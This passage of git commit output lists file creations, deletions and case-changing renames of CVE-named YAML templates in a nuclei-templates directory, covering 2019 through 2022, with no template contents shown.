nuclei-templates/CVE-2019/cve-2019-20141.yaml rename nuclei-templates/CVE-2019/{CVE-2019-20183.yaml => cve-2019-20183.yaml} (100%) create mode 100644 nuclei-templates/CVE-2019/cve-2019-20224.yaml rename nuclei-templates/CVE-2019/{CVE-2019-2729.yaml => cve-2019-2729.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/cve-2019-3401.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-3929.yaml delete mode 100644 nuclei-templates/CVE-2019/cve-2019-7192.yaml rename nuclei-templates/CVE-2019/{CVE-2019-7543.yaml => cve-2019-7543.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/cve-2019-8449.yaml rename nuclei-templates/CVE-2019/{CVE-2019-9041.yaml => cve-2019-9041.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2019/cve-2019-9922.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-10220.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-11515.yaml rename nuclei-templates/{wordpress/cve-2020-12054-4458.yaml => CVE-2020/CVE-2020-12054.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-12116.yaml rename nuclei-templates/CVE-2020/{cve-2020-12256.yaml => CVE-2020-12256.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-12271.yaml => CVE-2020-12271.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-12447.yaml => CVE-2020-12447.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-13158.yaml => CVE-2020-13158.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-13700.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-14408.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-14750.yaml rename nuclei-templates/CVE-2020/{cve-2020-15004.yaml => CVE-2020-15004.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-15050.yaml => CVE-2020-15050.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-15299.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-15505.yaml rename nuclei-templates/CVE-2020/{cve-2020-16139.yaml => CVE-2020-16139.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-16920.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-16952.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-17505.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-17519.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-20982.yaml rename nuclei-templates/CVE-2020/{cve-2020-21224.yaml => CVE-2020-21224.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-22208.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-22211.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-24912.yaml rename nuclei-templates/CVE-2020/{cve-2020-24949.yaml => CVE-2020-24949.yaml} (100%) rename nuclei-templates/{wordpress => CVE-2020}/CVE-2020-25213.yaml (86%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-25864.yaml rename nuclei-templates/CVE-2020/{cve-2020-26073.yaml => CVE-2020-26073.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-26153.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-26413.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-28036.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-28037.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-28038.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-28039.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-28188.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-28978.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-29164.yaml rename nuclei-templates/CVE-2020/{cve-2020-29453.yaml => CVE-2020-29453.yaml} (100%) rename nuclei-templates/CVE-2020/{cve-2020-35338.yaml => CVE-2020-35338.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-35846.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-35848.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-36155.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-36157.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-36289.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-36710.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-36739.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-36760.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-5777.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-6308.yaml rename nuclei-templates/CVE-2020/{cve-2020-6637.yaml => CVE-2020-6637.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-6859.yaml rename nuclei-templates/CVE-2020/{cve-2020-7961.yaml => CVE-2020-7961.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-7980.yaml rename nuclei-templates/CVE-2020/{cve-2020-8163.yaml => CVE-2020-8163.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8436.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-8641.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-8654.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-8658.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8771.yaml delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-8772.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-9047.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-9054.yaml rename nuclei-templates/CVE-2020/{cve-2020-9315.yaml => CVE-2020-9315.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/CVE-2020-9454.yaml rename nuclei-templates/CVE-2020/{cve-2020-9483.yaml => CVE-2020-9483.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/CVE-2020-9484.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-2020-9496.yaml create mode 100644 nuclei-templates/CVE-2020/CVE-20200924a(1).yaml rename nuclei-templates/CVE-2020/{CVE-2020-10124.yaml => cve-2020-10124.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-10220.yaml rename nuclei-templates/CVE-2020/{CVE-2020-10547.yaml => cve-2020-10547.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-11034.yaml => cve-2020-11034.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-11529.yaml => cve-2020-11529.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-11546.yaml => cve-2020-11546.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-12116.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-14408.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-14750.yaml rename nuclei-templates/CVE-2020/{CVE-2020-14864.yaml => cve-2020-14864.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-14883.yaml => cve-2020-14883.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-15505.yaml rename nuclei-templates/CVE-2020/{CVE-2020-15920.yaml => cve-2020-15920.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-16270.yaml => cve-2020-16270.yaml} (100%) rename nuclei-templates/{CVE-2019/cve-2019-16920.yaml => CVE-2020/cve-2020-16920.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-16952.yaml rename nuclei-templates/CVE-2020/{CVE-2020-17456.yaml => cve-2020-17456.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-17505.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-17519.yaml rename nuclei-templates/CVE-2020/{CVE-2020-17530.yaml => cve-2020-17530.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-18268.yaml => cve-2020-18268.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-19360.yaml => cve-2020-19360.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-20982.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-22208.yaml create mode 100644 nuclei-templates/CVE-2020/cve-2020-22210.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-22211.yaml rename nuclei-templates/CVE-2020/{CVE-2020-24579.yaml => cve-2020-24579.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-24912.yaml rename nuclei-templates/CVE-2020/{CVE-2020-25780.yaml => cve-2020-25780.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-25864.yaml rename nuclei-templates/CVE-2020/{CVE-2020-26214.yaml => cve-2020-26214.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-26413.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-28188.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-29164.yaml rename nuclei-templates/CVE-2020/{CVE-2020-35598.yaml => cve-2020-35598.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-35736.yaml => cve-2020-35736.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-35846.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-35848.yaml rename nuclei-templates/CVE-2020/{CVE-2020-36112.yaml => cve-2020-36112.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-36289.yaml rename nuclei-templates/CVE-2020/{CVE-2020-36365.yaml => cve-2020-36365.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-4038.yaml => cve-2020-4038.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-5775.yaml => cve-2020-5775.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-5777.yaml rename nuclei-templates/CVE-2020/{CVE-2020-5902.yaml => cve-2020-5902.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-6308.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-7048.yaml rename nuclei-templates/CVE-2020/{CVE-2020-7209.yaml => cve-2020-7209.yaml} (100%) create mode 100644 nuclei-templates/CVE-2020/cve-2020-7980.yaml rename nuclei-templates/CVE-2020/{CVE-2020-8515.yaml => cve-2020-8515.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-8641.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-8654.yaml rename nuclei-templates/CVE-2020/{CVE-2020-8813.yaml => cve-2020-8813.yaml} (100%) rename nuclei-templates/CVE-2020/{CVE-2020-8982.yaml => cve-2020-8982.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2020/cve-2020-9047.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-9054.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-9484.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-2020-9496.yaml delete mode 100644 nuclei-templates/CVE-2020/cve-20200924a(1).yaml rename nuclei-templates/CVE-2021/{cve-2021-1497.yaml => CVE-2021-1497.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-1498.yaml rename nuclei-templates/CVE-2021/{cve-2021-1499.yaml => CVE-2021-1499.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20038.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-20114.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-20123.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-20137.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-20167.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-21234.yaml rename nuclei-templates/CVE-2021/{cve-2021-21307.yaml => CVE-2021-21307.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-21402.yaml => CVE-2021-21402.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-21479.yaml => CVE-2021-21479.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21745.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21799.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-21800.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-21801.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-21805.yaml rename nuclei-templates/CVE-2021/{cve-2021-21881.yaml => CVE-2021-21881.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-21972.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-21985.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-22122.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-22873.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-22986.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24139.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24148.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24166.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24213.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24226.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24228.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24229.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24230.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24231.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24237.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24276.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24286.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24291.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24297.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24495.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24499.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24508.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24522.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24527.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24565.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24657.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24761.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24764.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24806.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24873.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-24925.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24948.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-24949.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-25017.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25022.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25040.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25041.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-25070.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-25087.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25089.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-25098.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-25281.yaml rename nuclei-templates/CVE-2021/{cve-2021-26086.yaml => CVE-2021-26086.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-26475.yaml rename nuclei-templates/CVE-2021/{cve-2021-26855.yaml => CVE-2021-26855.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-27132.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-27358.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-27561.yaml rename nuclei-templates/CVE-2021/{cve-2021-28149.yaml => CVE-2021-28149.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-28151.yaml rename nuclei-templates/CVE-2021/{cve-2021-29441.yaml => CVE-2021-29441.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-29490.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-29622.yaml rename nuclei-templates/CVE-2021/{cve-2021-3002.yaml => CVE-2021-3002.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-3019.yaml => CVE-2021-3019.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-31537.yaml rename nuclei-templates/CVE-2021/{cve-2021-32172.yaml => CVE-2021-32172.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-32682.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-3377.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-33904.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-34620.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-34623.yaml rename nuclei-templates/CVE-2021/{cve-2021-34805.yaml => CVE-2021-34805.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-35265.yaml rename nuclei-templates/CVE-2021/{cve-2021-35587.yaml => CVE-2021-35587.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-36450.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-36749.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-37859.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-38751.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-39226.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-39316.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-39501.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-40149.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-40438.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-40822.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-40859.yaml rename nuclei-templates/CVE-2021/{cve-2021-40960.yaml => CVE-2021-40960.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-41266.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-41291.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-41349.yaml rename nuclei-templates/CVE-2021/{cve-2021-41381.yaml => CVE-2021-41381.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/CVE-2021-41653.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-41951.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42192.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-42551.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-42566.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-42567.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-43287.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-43495.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-43778.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-43798.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-4392.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-4417.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-44515.yaml rename nuclei-templates/CVE-2021/{cve-2021-44529.yaml => CVE-2021-44529.yaml} (100%) mode change 100755 => 100644 delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-44848.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-45043.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-45428.yaml rename nuclei-templates/CVE-2021/{cve-2021-45967.yaml => CVE-2021-45967.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-46005.yaml => CVE-2021-46005.yaml} (100%) rename nuclei-templates/CVE-2021/{cve-2021-46381.yaml => CVE-2021-46381.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46422.yaml delete mode 100644 nuclei-templates/CVE-2021/CVE-2021-46424.yaml create mode 100644 nuclei-templates/CVE-2021/CVE-2021-46889.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-1498.yaml rename nuclei-templates/CVE-2021/{CVE-2021-20031.yaml => cve-2021-20031.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-20038.yaml rename nuclei-templates/CVE-2021/{CVE-2021-20092.yaml => cve-2021-20092.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-20114.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-20123.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-20137.yaml rename nuclei-templates/CVE-2021/{CVE-2021-20150.yaml => cve-2021-20150.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-20167.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-21234.yaml rename nuclei-templates/CVE-2021/{CVE-2021-21287.yaml => cve-2021-21287.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-21311.yaml => cve-2021-21311.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-21745.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21799.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-21800.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-21801.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-21805.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-21972.yaml rename nuclei-templates/CVE-2021/{CVE-2021-21975.yaml => cve-2021-21975.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-21985.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-22122.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-22873.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-22986.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-24210.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-24406.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-25281.yaml rename nuclei-templates/CVE-2021/{CVE-2021-25864.yaml => cve-2021-25864.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-26475.yaml rename nuclei-templates/CVE-2021/{CVE-2021-26598.yaml => cve-2021-26598.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-27132.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-27358.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-27561.yaml rename nuclei-templates/CVE-2021/{CVE-2021-28073.yaml => cve-2021-28073.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-28151.yaml rename nuclei-templates/CVE-2021/{CVE-2021-28164.yaml => cve-2021-28164.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-28918.yaml => cve-2021-28918.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-29203.yaml => cve-2021-29203.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-29490.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-29622.yaml rename nuclei-templates/CVE-2021/{CVE-2021-30497.yaml => cve-2021-30497.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-31537.yaml rename nuclei-templates/CVE-2021/{CVE-2021-31581.yaml => cve-2021-31581.yaml} (100%) rename nuclei-templates/CVE-2021/{CVE-2021-31862.yaml => cve-2021-31862.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-32682.yaml rename nuclei-templates/CVE-2021/{CVE-2021-32820.yaml => cve-2021-32820.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-3377.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-33904.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-35265.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-36450.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-36749.yaml rename nuclei-templates/CVE-2021/{CVE-2021-37580.yaml => cve-2021-37580.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-37859.yaml rename nuclei-templates/CVE-2021/{CVE-2021-38540.yaml => cve-2021-38540.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-38647.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-38751.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-39226.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-39501.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-40149.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-40438.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-40822.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-40859.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-41266.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-41291.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-41349.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-41653.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-41773.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-41951.yaml rename nuclei-templates/CVE-2021/{CVE-2021-42063.yaml => cve-2021-42063.yaml} (100%) create mode 100644 nuclei-templates/CVE-2021/cve-2021-42192.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-42551.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-42566.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-42567.yaml rename nuclei-templates/CVE-2021/{CVE-2021-43062.yaml => cve-2021-43062.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-43287.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-43495.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-43778.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-43798.yaml delete mode 100644 nuclei-templates/CVE-2021/cve-2021-44228.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-44515.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-44848.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-45043.yaml rename nuclei-templates/CVE-2021/{CVE-2021-45380.yaml => cve-2021-45380.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2021/cve-2021-45428.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-46422.yaml create mode 100644 nuclei-templates/CVE-2021/cve-2021-46424.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0141.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0142.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0250.yaml rename nuclei-templates/CVE-2022/{cve-2022-0281.yaml => CVE-2022-0281.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0320.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0328.yaml rename nuclei-templates/CVE-2022/{cve-2022-0378.yaml => CVE-2022-0378.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0437.yaml rename nuclei-templates/CVE-2022/{cve-2022-0482.yaml => CVE-2022-0482.yaml} (100%) create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0513.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0540.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0543.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0640.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0681.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0694.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-0770.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0870.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-0963.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1166.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1209.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1281.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1282.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-1815.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1895.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-1985.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2167.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-21705.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-2260.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-2290.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-22972.yaml rename nuclei-templates/CVE-2022/{cve-2022-23134.yaml => CVE-2022-23134.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-23178.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2362.yaml rename nuclei-templates/CVE-2022/{cve-2022-23881.yaml => CVE-2022-23881.yaml} (100%) rename nuclei-templates/CVE-2022/{cve-2022-23944.yaml => CVE-2022-23944.yaml} (100%) rename nuclei-templates/{CVE-2021/cve-2021-3129.yaml => CVE-2022/CVE-2022-24259.yaml} (100%) rename nuclei-templates/CVE-2022/{cve-2022-24288.yaml => CVE-2022-24288.yaml} (100%) delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-2461.yaml delete mode 100644 nuclei-templates/CVE-2022/CVE-2022-2486.yaml create mode 100644 nuclei-templates/CVE-2022/CVE-2022-2488.yaml delete mode 